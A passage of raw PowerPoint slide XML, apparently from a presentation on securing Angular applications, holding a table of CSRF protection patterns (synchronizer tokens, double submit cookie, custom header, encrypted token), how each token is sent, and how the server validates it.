                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602541649"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="35496" y="1207254"/>
          <a:ext cx="9036496" cy="2026920"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{3B4B98B0-60AC-42C2-AFA5-B58CD77FA1E5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2088232"/>
                <a:gridCol w="1008112"/>
                <a:gridCol w="3125506"/>
                <a:gridCol w="2814646"/>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Pattern</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Token</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Strategy</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Server-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>side</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> validation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Synchronizer Tokens</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst>
                          <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                            <a:srgbClr val="000000">
                              <a:alpha val="43137"/>
                            </a:srgbClr>
                          </a:outerShdw>
                        </a:effectLst>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Random</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="ctr">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Stored in HTTP Session </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="ctr">
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>sent as Request parameter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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i="0" kern="1200" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Session’s token vs Request param</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="-91440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outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Double Submit Cookie</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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fr-FR" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Random</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Sent as Cookie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Request parameter</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Cookie’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>token</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> vs </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>param</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="-914400" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Custom Request Header</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kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>No </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>matter</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Sent as</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> header</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Check </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>header’s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> existence</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="-644400">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1200" dirty="0" smtClean="0">
                          <a:effectLst>
                            <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                              <a:srgbClr val="000000">
                                <a:alpha val="43137"/>
                              </a:srgbClr>
                            </a:outerShdw>
                          </a:effectLst>
                        </a:rPr>
                        <a:t>Encrypted Token</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="ctr">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Signed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="ctr">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" kern="1200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Encrypted</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" kern="1200" baseline="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t>Sent as</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0"/>
                        <a:t>Request</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
                        <a:t> header</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" indent="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
                        <a:buNone/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Token</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1200" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>decryption</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" i="0" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18843" y="2046428"/>
            <a:ext cx="909325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8843" y="2427734"/>
            <a:ext cx="9093258"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532" y="2859782"/>
            <a:ext cx="9108504"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ZoneTexte 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7172365" y="4211694"/>
            <a:ext cx="1872208" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" u="sng" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>HttpClientXsrfModule</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="ZoneTexte 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7308304" y="3743337"/>
            <a:ext cx="1282359" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0" err="1" smtClean="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>httpProvider</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1200" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="ZoneTexte 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3702112" y="3610646"/>
            <a:ext cx="1767343" cy="401264"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="540000" lvl="1" indent="-270000">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="384"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="tx2"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Configuration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000">
                    <a:alpha val="43137"/>
                  </a:srgbClr>
                </a:outerShdw>
              </a:effectLst>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06293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DAF489CC-3B7A-4DA5-A8C0-4984788D0EC5}" type="slidenum">
              <a:rPr lang="nl-NL" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="nl-NL"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du contenu 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé pour une image  4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295216" y="195486"/>
            <a:ext cx="6653048" cy="567000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Secure your Angular Application</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
